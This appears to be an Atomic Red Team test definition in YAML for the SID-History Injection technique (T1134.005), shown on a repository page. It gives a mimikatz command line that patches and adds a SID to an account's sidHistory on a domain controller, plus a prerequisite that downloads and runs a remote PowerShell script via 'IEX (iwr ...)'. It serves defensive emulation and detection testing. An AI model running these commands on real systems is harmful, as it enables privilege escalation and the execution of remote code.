security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1134.005/T1134.005.yaml
T
Carrie Roberts 068d32b1ea use ExternalPayloads directory (#2460) 
* use ExternalPayloads directory

* use ExternalPayloads directory

* use ExternalPayloads directory
2023-06-15 10:16:12 -06:00

46 lines
2.1 KiB
YAML
Raw Permalink Blame History

attack_technique: T1134.005
display_name: 'Access Token Manipulation: SID-History Injection'
atomic_tests:
- name: Injection SID-History with mimikatz
auto_generated_guid: 6bef32e5-9456-4072-8f14-35566fb85401
description: |
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. Must be run on domain controller
supported_platforms:
- windows
input_arguments:
sid_to_inject:
description: SID to inject into sidhistory
type: string
default: S-1-5-21-1004336348-1177238915-682003330-1134
sam_account_name:
description: Target account to modify
type: string
default: '$env:username'
mimikatz_path:
description: Mimikatz windows executable
type: path
default: 'PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe'
dependency_executor_name: powershell
dependencies:
- description: |
Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$mimikatz_exe = cmd /c echo #{mimikatz_path}
$basePath = Split-Path $mimikatz_exe | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
executor:
name: command_prompt
elevation_required: true
command: |
#{mimikatz_path} "privilege::debug" "sid::patch" "sid::add /sid:#{sid_to_inject} /sam:#{sam_account_name}" "exit"
cleanup_command: |
#{mimikatz_path} "sid::clear /sam:#{sam_account_name}" "exit"
Reference in New Issue View Git Blame Copy Permalink